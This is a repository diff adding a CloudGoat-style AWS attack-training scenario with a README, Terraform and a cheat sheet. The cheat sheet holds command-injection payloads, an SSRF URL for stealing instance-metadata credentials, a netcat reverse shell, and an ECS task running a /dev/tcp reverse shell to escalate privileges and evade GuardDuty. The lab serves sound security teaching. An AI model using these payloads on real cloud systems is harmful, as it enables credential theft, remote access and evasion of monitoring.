Scenario | ecs_privesc_evade_protection

README.md

@@ -227,6 +227,14 @@ Starting with access the "ruse" EC2 the user leverages the instace profile to ba
 
 [Visit Scenario Page.](scenarios/ecs_efs_attack/README.md)
 
+### ecs_privesc_evade_protection (Medium / Moderate)
+
+`$ ./cloudgoat.py create ecs_privesc_evade_protection`
+
+A user begins by accessing a working web service to a container inside EC2. The attacker can exploit a web service vulnerability to get credentials from the metadata API in EC2, or to control the container. This credential allows the attacker to initiate a new container with a specific role and control it. Based on this action, make a priviledge escalation, and read FLAG in S3.
+
+[Visit Scenario Page.](scenarios/ecs_privesc_evade_protection/README.md)
+
 ## Usage Guide
 
 The basic anatomy of a CloudGoat command is as follows:

core/python/commands.py

@@ -399,7 +399,7 @@ def create_scenario(self, scenario_name_or_path, profile):
         }
 
         # The if-else block below exists because the detection_evasion scenario requires user input at deploy time.
-        if scenario_name == "detection_evasion":
+        if scenario_name in ["detection_evasion", "ecs_privesc_evade_protection"]:
             tf_vars["user_email"] = self.get_user_email()
 
         plan_retcode, plan_stdout, plan_stderr = terraform.plan(
@@ -525,7 +525,7 @@ def destroy_all_scenarios(self, profile):
                         "region": self.aws_region,
                 }
 
-                if scenario_name == "detection_evasion":
+                if scenario_name in ["detection_evasion", "ecs_privesc_evade_protection"]:
                     tf_vars["user_email"] = self.get_user_email()
 
                 destroy_retcode, destroy_stdout, destroy_stderr = terraform.destroy(
@@ -620,7 +620,7 @@ def destroy_scenario(self, scenario_name_or_path, profile, confirmed=False):
                 "region": self.aws_region,
             }
 
-            if scenario_name == "detection_evasion":
+            if scenario_name in ["detection_evasion", "ecs_privesc_evade_protection"]:
                 tf_vars["user_email"] = self.get_user_email()
 
             destroy_retcode, destroy_stdout, destroy_stderr = terraform.destroy(

scenarios/ecs_privesc_evade_protection/README.md

@@ -0,0 +1,61 @@
+# Scenario: ecs_privesc_evade_protection
+
+**Size**: Medium
+
+**Difficulty**: Moderate
+
+**Command**: `$ ./cloudgoat.py create guardduty_bypass_with_ecs`
+
+## Scenario Resources
+
+- 1 ECS with:
+    - 1 * ASG with :
+        - 1 * EC2
+    - 1 * Service (web container)
+- 2 * S3 (1 * secret, 1 * cloudtrail)
+- Detection Mechanisms
+  - GuardDuty enabled
+  - CloudWatch
+  - CloudTrail
+  - EventBridge
+  - Lambda
+  - SES
+
+## Scenario Start(s)
+
+Scenario starts as a web user.
+
+> **Warning**: If GuardDuty have enabled before creating scenario, It would cause an error.
+
+## Scenario Goal(s)
+
+Read flag.txt in S3 with avoiding various defense techniques.
+
+## Summary
+
+There is a very vulnerable website operating on AWS. The site's security administrator became frightened and took some web security measures and enabled GuardDuty for EC2's credentials. Take a detour and approach S3 and win the secret string.
+
+## Email setup
+
+- If AWS Guard Duty detects your attack in the scenario, we will send you an email. So you need to register an email and respond to AWS authentication mail sent to that email before start.
+- If you prefer not to use a standard email address, you might consider services such as https://temp-mail.org/ or https://www.fakemail.net/.
+
+# SPOILER ALERT: There are spoilers for the scenario blew this point.
+
+## Exploitation Route
+
+![Scenario Route(s)](assets/diagram.png)
+
+## Scenario Walk-through
+
+### Easy Path
+- Attacker accesses the web service of a container inside EC2 managed by ECS.
+- The attacker exploits vulnerabilities in a web service to access the EC2's credentials or take control of the container.
+- The attacker accesses S3. Gets the Secret String in `flag.txt` and exits the scenario.
+
+### Hard Path
+- Attacker accesses the web service of a container inside EC2 managed by ECS.
+- The attacker exploits vulnerabilities in a web service to access the EC2's credentials or take control of the container.
+- The attacker defines and executes an ECS task with the authority of the web developer to privesc or bypass mitigations. Perform a reverse shell attack to access the container been created.
+- The attacker accesses S3 at the container to bypass GuardDuty detection. Gets the Secret String in `secret-string.txt` and exits the scenario.
+

scenarios/ecs_privesc_evade_protection/cheat_sheet.md

@@ -0,0 +1,98 @@
+# Easy Path
+
+Go to `http://<ec2_ip_address>`
+
+### Command Injection
+
+```
+; aws s3 ls
+; aws s3 ls s3://<bucket-name>/
+; aws s3 cp s3://<bucket-name>/flag.txt .
+; cat flag.txt
+```
+
+### SSRF
+```
+# SSRF Attack.
+http://<ec2_ip_address>/?url=http://[::ffff:a9fe:a9fe]/latest/meta-data/iam/security-credentials/<role>
+
+# Configure credentials.
+aws configure --profile attacker
+echo "aws_session_token = <token>" >> ~/.aws/credentials
+
+# Access to S3.
+aws s3 ls
+aws s3 ls s3://<bucket-name>/
+aws s3 cp s3://<bucket-name>/flag.txt .
+cat flag.txt
+```
+
+
+# Hard Path
+
+Go to `http://<ec2_ip_address>`
+
+### SSRF
+
+```
+http://<ec2_ip_address>/?url=http://[::ffff:a9fe:a9fe]/latest/meta-data/iam/security-credentials/<role>
+aws configure --profile attacker
+echo "aws_session_token = <token>" >> ~/.aws/credentials
+```
+
+### Command Injection
+
+- prepare another host for revshell attack with `nc -lvp 4000`
+- command injection on web with `; nc <ip_address> 4000 -e /bin/sh &`
+
+### For more information
+
+- more information about iam
+
+```
+aws sts get-caller-identity
+aws iam get-role --role-name <role>
+aws iam list-attached-role-policies --role-name <role>
+aws iam list-role-policies --role-name <role>
+aws iam get-role-policy --role-name <role> --policy-name <policy>
+aws iam list-roles
+```
+
+- more information about ecs
+
+```
+aws ecs list-clusters --region <region>
+aws ecs describe-clusters --region <region> --clusters <cluster>
+aws ecs list-container-instances --region <region> --cluster <cluster_arn>
+```
+
+### ECS Privesc
+
+* Attacker prepare revshell at other public ip point with `nc -lvp 4000`.
+
+* And now come back to CLI.
+
+```
+# ECS Task definition with revshell command.
+aws ecs register-task-definition --region <region> --family <task_name> --task-role-arn <task_role_arn> --network-mode "awsvpc" --cpu 256 --memory 512 --requires-compatibilities "[\"FARGATE\"]" --container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/<revshell_ip>/<revshell_port> 0>&1\\\"\"]}]"
+
+# For run-task, find available subnets.
+aws ec2 describe-subnets --region <region>
+
+# Run task.
+aws ecs run-task --region <region> --task-definition <task_name> --cluster <cluster_arn> --launch-type FARGATE --network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"ENABLED\", \"subnets\":[\"<subnet>\"]}}"
+```
+After a few minutes, the revshell will be connected by container.
+Let's do it on revshell.
+
+### Access S3
+
+```
+apt-get update
+apt-get install awscli
+
+aws s3 ls
+aws s3 ls s3://<bucket-name>/
+aws s3 cp s3://<bucket-name>/secret-string.txt .
+cat secret-string.txt
+```

scenarios/ecs_privesc_evade_protection/manifest.yml

@@ -0,0 +1,20 @@
+---
+  # The name of the scenario, alpha-numeric characters only, and underscore-separated
+- name: ecs_privesc_evade_protection
+  # The name of the author(s), comma separated
+- author: Yong Siwoo, Park Do Kyu, Park Seo Hyun, Jung Ho Shim, Chae Jinsoo
+  # The version of the scenario, where major versions are breaking changes and minor are small fixes.
+- version: 1.0
+  # Text displayed to the user when they type "{{ scenario_name }} help"
+- help: |
+        Within the container that is running a web hosting service on an EC2 instance managed by ECS, 
+        please access the metadata service to obtain the temporary credentials for the EC2 instance. 
+        Then, exploit these privileges to read the secret string inside the flag.txt file located within S3.
+
+        Note: if AWS GuardDuty detects your attack, it will refresh the temporary credentials of the EC2 instance 
+        and send an alert email to the registered address. 
+        Endeavor to proceed with utmost caution to avoid triggering these alerts.
+
+# Records the date upon which this scenario was last updated, in MM-DD-YYYY format
+- last-updated: 11-02-2023
+...

scenarios/ecs_privesc_evade_protection/terraform/cloudtrail.tf

@@ -0,0 +1,6 @@
+# Using CloudTrail for GuardDuty
+resource "aws_cloudtrail" "cloudtrail" {
+  name           = "cg-cloudtrail-${var.cgid}"
+  s3_bucket_name = aws_s3_bucket.cloudtrail_bucket.id
+  enable_logging = true
+}

scenarios/ecs_privesc_evade_protection/terraform/cloudwatch.tf

@@ -0,0 +1,29 @@
+# Define a CloudWatch Event Rule to capture AWS GuardDuty findings
+resource "aws_cloudwatch_event_rule" "guardduty_events" {
+  name        = "cg-guardduty-events-${var.cgid}"
+  event_pattern = jsonencode({
+    "source" : ["aws.guardduty"],
+    "detail-type" : ["GuardDuty Finding"],
+    "detail": {
+      "type": [
+        "UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.OutsideAWS",
+      ]
+    }
+  })
+}
+
+# Create a target for the CloudWatch Event Rule to invoke a Lambda function
+resource "aws_cloudwatch_event_target" "ecs_event_target" {
+  rule = aws_cloudwatch_event_rule.guardduty_events.name
+  arn  = aws_lambda_function.guardduty_lambda.arn
+}
+
+# Enable AWS GuardDuty for threat detection and continuous monitoring
+# Note : The GuardDuty in the user account must be completely disabled to function normally.
+resource "aws_guardduty_detector" "detector" {
+  enable = true
+}
+
+resource "aws_cloudwatch_log_group" "lambda_log" {
+  name = "/aws/lambda/${aws_lambda_function.guardduty_lambda.function_name}"
+}

scenarios/ecs_privesc_evade_protection/terraform/data_sources.tf

@@ -0,0 +1,39 @@
+data "aws_caller_identity" "current" {}
+
+# Search based on tag to get the IP of EC2 that is automatically generated by ASG.
+data "aws_instances" "asg_instance" {
+  depends_on = [time_sleep.wait_for_instance]
+
+  instance_tags = {
+    Name = "cg-ec2-instance-${var.cgid}"
+  }
+}
+
+data "aws_availability_zones" "current_az" {
+  state = "available"
+}
+
+# Get AMI of the latest version of Amazon Linux 2 for ECS.
+data "aws_ami" "latest_amazon_linux" {
+  most_recent = true
+
+  filter {
+    name   = "name"
+    values = ["amzn2-ami-ecs-hvm-*-x86_64-ebs"]
+  }
+
+  filter {
+    name   = "virtualization-type"
+    values = ["hvm"]
+  }
+
+  owners = ["amazon"]
+}
+
+# compress index.py to lambda.zip
+data "archive_file" "lambda_zip" {
+  type             = "zip"
+  source_file      = "./index.py"
+  output_file_mode = "0666"
+  output_path      = "./lambda.zip"
+}